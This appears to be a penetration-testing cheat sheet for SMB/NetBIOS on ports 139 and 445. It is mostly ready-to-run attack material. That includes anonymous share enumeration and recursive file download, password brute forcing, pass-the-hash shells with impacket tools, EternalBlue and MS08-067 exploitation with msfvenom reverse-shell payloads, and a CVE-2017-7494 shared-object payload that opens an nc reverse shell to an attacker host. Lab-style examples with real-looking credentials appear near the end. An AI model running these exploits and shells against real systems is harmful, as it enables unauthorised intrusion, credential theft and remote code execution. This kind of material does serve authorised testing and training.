🥸 Port 138-139-445 (SMB/netbios)

Version if nmap didn’t detect it

Sometimes nmap doesn’t show the version of Samba on the remote host. If this happens, a good way to find out which version is running is to capture traffic with Wireshark against the remote host on 445/139 while running smbclient -L in parallel; then follow the TCP stream, and the version string the server sends should be visible.

OR

sudo ngrep -i -d <INTERFACE> 's.?a.?m.?b.?a.*[[:digit:]]' port 139
smbclient -L <IP>
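The capture trick above works because the server's SMB1 Session Setup AndX response carries its Native OS and Native LAN Manager strings in clear text (Samba puts its version in the latter, which is what the ngrep pattern matches). The Python below is an added example, not part of the original page: it builds a constructed response following the SMB1 layout and parses those fields back out, which is the same information a defender can use to inventory SMB versions from a passive capture. All packet values other than the strings are filler chosen for the example.

```python
import struct

SMB_COM_SESSION_SETUP_ANDX = 0x73   # SMB1 command whose response carries the banner
FLAGS2_UNICODE = 0x8000             # flags2 bit: strings are UTF-16LE

def build_session_setup_response(native_os, native_lanman, domain="WORKGROUP", unicode=True):
    """Constructed SMB1 Session Setup AndX response (server -> client) inside a NetBIOS
    session message. Sample packet only; field values other than the strings are filler."""
    flags2 = 0x0001 | (FLAGS2_UNICODE if unicode else 0)
    header = (b"\xffSMB" + bytes([SMB_COM_SESSION_SETUP_ANDX]) + struct.pack("<I", 0)  # status
              + b"\x88" + struct.pack("<HH", flags2, 0) + b"\x00" * 8 + b"\x00\x00"      # flags..reserved
              + struct.pack("<HHHH", 0, 0xfeff, 0x64, 1))                                 # TID PID UID MID
    words = bytes([3, 0xff, 0]) + struct.pack("<HH", 0, 0)   # WordCount=3, no AndX, Action=0
    if unicode:
        enc = lambda s: s.encode("utf-16-le") + b"\x00\x00"
        data = b"\x00" + enc(native_os) + enc(native_lanman) + enc(domain)  # 1 pad byte: 2-byte align
    else:
        enc = lambda s: s.encode("ascii") + b"\x00"
        data = enc(native_os) + enc(native_lanman) + enc(domain)
    body = header + words + struct.pack("<H", len(data)) + data           # ByteCount then data
    return b"\x00" + len(body).to_bytes(3, "big") + body                  # NetBIOS session header

def _cstring(buf, pos, unicode):
    """Read one NUL-terminated string at pos (UTF-16LE or ASCII); return (text, next_pos)."""
    step = 2 if unicode else 1
    end = pos
    while end + step <= len(buf) and buf[end:end + step] != b"\x00" * step:
        end += step
    return buf[pos:end].decode("utf-16-le" if unicode else "ascii", "replace"), end + step

def parse_session_setup_banner(pkt):
    """Return the Native OS, Native LAN Manager and Primary Domain strings from one
    captured Session Setup AndX response, i.e. what 'follow TCP stream' shows in clear."""
    if len(pkt) < 36 or pkt[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    smb = pkt[4:4 + int.from_bytes(pkt[1:4], "big")]
    if smb[:4] != b"\xffSMB" or smb[4] != SMB_COM_SESSION_SETUP_ANDX:
        raise ValueError("not an SMB1 Session Setup AndX message")
    unicode = bool(struct.unpack_from("<H", smb, 10)[0] & FLAGS2_UNICODE)
    bc_off = 33 + 2 * smb[32]                       # WordCount at 32, then that many 16-bit words
    byte_count = struct.unpack_from("<H", smb, bc_off)[0]
    pos, end = bc_off + 2, bc_off + 2 + byte_count
    if unicode and pos % 2:                         # Unicode strings start on a 2-byte boundary
        pos += 1
    fields = {}
    for name in ("native_os", "native_lanman", "primary_domain"):
        fields[name], pos = _cstring(smb[:end], pos, unicode)
    return fields
```

Feed `parse_session_setup_banner` the raw TCP payload of the server's Session Setup AndX reply from a capture and `native_lanman` gives the version string; SMB2-only servers do not send this message, so a missing banner is itself a finding.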

Scan for vulnerability

nmap -p139,445 --script "smb-vuln-* and not(smb-vuln-regsvc-dos)" --script-args smb-vuln-cve-2017-7494.check-version,unsafe=1 <IP>

If :

Manual testing

smbmap -H <IP>
smbmap -u '' -p '' -H <IP>
smbmap -u 'guest' -p '' -H <IP>
smbmap -u '' -p '' -H <IP> -R

crackmapexec smb <IP>
crackmapexec smb <IP> -u '' -p ''
crackmapexec smb <IP> -u 'guest' -p ''
crackmapexec smb <IP> -u '' -p '' --shares

enum4linux -a <IP>

smbclient --no-pass -L //$IP
smbclient //<IP>/<SHARE>

# Download all files from a directory recursively
smbclient //<IP>/<SHARE> -U <USER> -c "prompt OFF;recurse ON;mget *"

Brute force

crackmapexec smb <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> smb://<IP> -u -vV

Mount a SMB share

mkdir /tmp/share
sudo mount -t cifs //<IP>/<SHARE> /tmp/share
sudo mount -t cifs -o 'username=<USER>,password=<PASSWORD>' //<IP>/<SHARE> /tmp/share

smbclient //<IP>/<SHARE>
smbclient //<IP>/<SHARE> -U <USER>

Get a shell

psexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
psexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>

wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
wmiexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>

smbexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
smbexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>

atexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP> <COMMAND>
atexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>

EternalBlue (MS17-010)

https://github.com/3ndG4me/AutoBlue-MS17-010

Check if vulnerable

python eternal_checker.py <IP>

Prepare shellcodes and listeners

cd shellcode
./shell_prep.sh
cd ..
./listener_prep.sh

Exploit

python eternalblue_exploit<NUMBER>.py <IP> shellcode/sc_all.bin

May need to run it multiple times

If this doesn’t work, try this one

python zzz_exploit.py <IP>

MS08-067

# Download exploit code
git clone https://github.com/andyacer/ms08_067.git

# Generate payload
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
msfvenom -p windows/shell_bind_tcp RHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

# Modify
Modify ms08_067_2018.py and replace the shellcode variable with the one generated by msfvenom.

# Listener
nc -lvp <PORT>

# Exploit
python ms08_067_2018.py <IP> <NUMBER> 445

CVE-2017-7494

# Download exploit code
git clone https://github.com/joxeankoret/CVE-2017-7494

Create a new file named poc.c :

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setresuid() */

/* Entry point that Samba calls when it loads the shared object as a module */
int samba_init_module(void)
{
	setresuid(0,0,0);
	system("ping -c 3 <IP>");
	return 0;
}

# Build
gcc -o test.so -shared poc.c -fPIC
# Start an ICMP listener
sudo tcpdump -i <INTERFACE> icmp

# Exploit
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so

If you receive 3 pings on your listener then the exploit works. Now let’s get a shell:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setresuid() */

/* Entry point that Samba calls when it loads the shared object as a module */
int samba_init_module(void)
{
	setresuid(0,0,0);
	system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f");
	return 0;
}

# Build
gcc -o test.so -shared poc.c -fPIC
# Start a listener
nc -lvp <PORT>

# Exploit
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so

nmap

root@kali:~# nmap -v -p 139,445 --script smb-vuln-* 192.168.56.101

nbtscan

root@kali:~# nbtscan -r 192.168.11.0/24

enum4linux

root@kali:~# enum4linux -a 192.168.56.101

smbmap

smbmap -H 10.10.10.161
ADMIN$
C$
Data
smbmap -H 10.10.10.16 -R DATA #recursive search
smbmap -H 10.10.10.16 -R DATA --download 'Data\\Search\\archivo.txt'
With credentials:

smbmap -u Tempuser -p Welcome123 -H 10.10.10.16 -R DATA

Enumerating with domain credentials:

smbmap -d active.htb -u SVC_TGS -p GPPsaras2012 -H 10.10.10.100

smbclient

smbclient \\\\$ip\\$share -I target -N
smbclient -N -L 192.168.168.168 - lists the SMB server type (often revealing the Samba version) and the available shares

mount

smbclient \\\\secnotes.htb\\new-site -U anonymous
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *

rpcclient

rpcclient -U "" target

Mount shares

mount -t cifs -o user=USERNAME,sec=ntlm,dir_mode=0077 "//10.10.10.10/My Share" /mnt/cifs

mount shares 2

sudo apt-get install cifs-utils
mkdir /mnt/Replication
mount -t cifs //10.10.10.100/Replication /mnt/Replication -o username=<username>,password=<password>,domain=active.htb
grep -R password /mnt/Replication/

nmblookup

nmblookup queries NetBIOS names and maps them to IP addresses on a network using NetBIOS over TCP/IP queries.

nmblookup -A target

acccheck

acccheck -v -t (target IP) -u user -P /usr/share/dirb/wordlists/common.txt - attempts to connect to the IPC$ or ADMIN$ shares

Shell when we have the credentials

root@kali:# psexec.py secnotes/administrator:@secnotes.htb
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:

Shell 2 when we have credentials

winexe -U Administrator //10.0.0.0 "cmd.exe"

If SMB is up locally but the port is closed externally, then try a remote port forward back to your attacking machine:

plink.exe -l sshproxy -pw sshproxy -R 445:127.0.0.1:445 10.10.10.10
winexe -U Administrator //127.0.0.1 "cmd.exe"
